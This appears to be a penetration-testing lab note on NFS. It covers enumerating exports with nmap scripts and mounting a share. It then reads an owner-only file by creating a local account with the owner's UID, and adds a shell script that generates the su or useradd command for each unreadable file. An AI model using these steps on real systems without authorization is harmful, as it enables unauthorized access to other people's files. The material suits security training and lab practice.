NMAP
Scan the portmapper port and enumerate NFS exports
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.181.201
...
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836540.0 6877088.0 22% 16.0T 32000
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
MAC Address: 02:8E:3F:CE:25:87 (Unknown)
List the available NFS NSE scripts
ls -1 /usr/share/nmap/scripts/nfs*
Mount a file system
Create a mount point and mount the export (-o nolock avoids depending on the client-side NFS lock manager):
mkdir home
sudo mount -o nolock 10.11.1.72:/home ~/home/
kali@kali:~$ cd home/ && ls
jenny joe45 john marcus ryuu
Permissions on Mounted NFS
If the export mounts but a file inside it is unreadable, look at who owns it. NFS with the default AUTH_SYS authentication trusts whatever UID and GID the client presents, so if a file is owned by UID 1014 with read (r), write (w) and execute (x) permissions granted only to its owner, any client process running as UID 1014 gets that access. Since we have complete control of our Kali machine, we can add a local user with the adduser command, change its UID to 1014, su to that user, and then try accessing the file again:
kali@kali:~/home/stefan$ sudo adduser pwn
Adding user 'pwn' ...
Adding new group 'pwn' (1001) ...
Adding new user 'pwn' (1001) with group 'pwn' ...
Creating home directory '/home/pwn' ...
Copying files from '/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for pwn
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
The output above shows that the new user was created with UID 1001, which is not what we need. We can change it to 1014 using sed and confirm the change took place. The -i option edits the file in place and the -e option supplies the script, here 's/1001/1014/g', which replaces every occurrence of 1001 in /etc/passwd (so the GID field of the pwn line changes as well, while /etc/group still lists the pwn group as 1001, which is why id later shows gid=1014 without a name). Because the replacement is global, it would also touch any other line containing 1001, so check that no other account uses that number first; sudo usermod -u 1014 pwn does the same job more safely:
sudo sed -i -e 's/1001/1014/g' /etc/passwd
cat /etc/passwd | grep pwn
pwn:x:1014:1014:,,,:/home/pwn:/bin/bash
We will use the su command to switch the session to the new user, id to confirm the UID now in effect, and then try to access the file again:
kali@kali:~/home/marcus$ su pwn
pwn@kali:/root/home/marcus$ id
uid=1014(pwn) gid=1014 groups=1014
pwn@kali:/root/home/marcus$ cat creds.txt
Not what you are looking for, try harder!!! :O)
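The two steps above (find the owner of the file you cannot read on the mounted export, then obtain a local account with that UID) can be scripted. The following is an added example, not part of the original page: it parses `ls -ln` output taken on a mount point, lists regular files whose mode grants no read bit to "others" together with the owner UID and GID that would be needed, and, for a given UID, emits either an `su` to an existing local account with that UID or the `useradd` command to create one. The listing, the file names and the user name pwn are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): map unreadable files on a
# mounted NFS export to the UID/GID a client would need to present.

# Constructed sample `ls -ln` output from a mounted export (hypothetical).
SAMPLE_LS='total 12
drwxr-xr-x 2 0    0    4096 Sep  4  2019 .
drwxr-xr-x 5 0    0    4096 Sep  4  2019 ..
-rw-------  1 1014 1014   45 Sep  4  2019 creds.txt
-rw-r--r--  1 1014 1014  120 Sep  4  2019 notes.txt
-rw-rw----  1 0    108   512 Sep  4  2019 auth.log'

# Print "uid gid name" for every regular file whose mode string has no read
# bit in the "others" position (character 8 of the 10-character mode).
# Input: the text of an `ls -ln` listing.
unreadable_by_others() {
  printf '%s\n' "$1" | awk '
    $1 ~ /^-/ && NF >= 9 {
      if (substr($1, 8, 1) != "r") print $3, $4, $NF
    }'
}

# Name of the local account that already has the given UID, if any
# (reads /etc/passwd directly so it works without getent).
local_user_for_uid() {
  awk -F: -v u="$1" '$3 == u { print $1; exit }' /etc/passwd
}

# Print the command that gives us a shell with the target UID: reuse an
# existing account, or create one with useradd (safer than editing
# /etc/passwd with a global sed, which can change unrelated lines).
# $1 = UID to impersonate, $2 = name for a new user (default: pwn).
uid_squat_cmd() {
  uid=$1
  user=${2:-pwn}
  existing=$(local_user_for_uid "$uid")
  if [ -n "$existing" ]; then
    printf 'su - %s\n' "$existing"
  else
    printf 'sudo useradd -u %s -m -s /bin/bash %s && su - %s\n' "$uid" "$user" "$user"
  fi
}

# Walk the sample listing and show what each unreadable file requires.
unreadable_by_others "$SAMPLE_LS" | while read -r uid gid name; do
  printf '%s: owner uid=%s gid=%s -> %s\n' "$name" "$uid" "$gid" "$(uid_squat_cmd "$uid")"
done
```

On a real mount, replace SAMPLE_LS with `"$(ls -ln ~/home/marcus)"`. The GID is printed as well because a file such as the constructed auth.log, owned by root but group-readable, is better reached by joining the group than by becoming UID 0: with the usual root_squash export option the server maps a client UID of 0 to the anonymous user, so squatting root rarely helps.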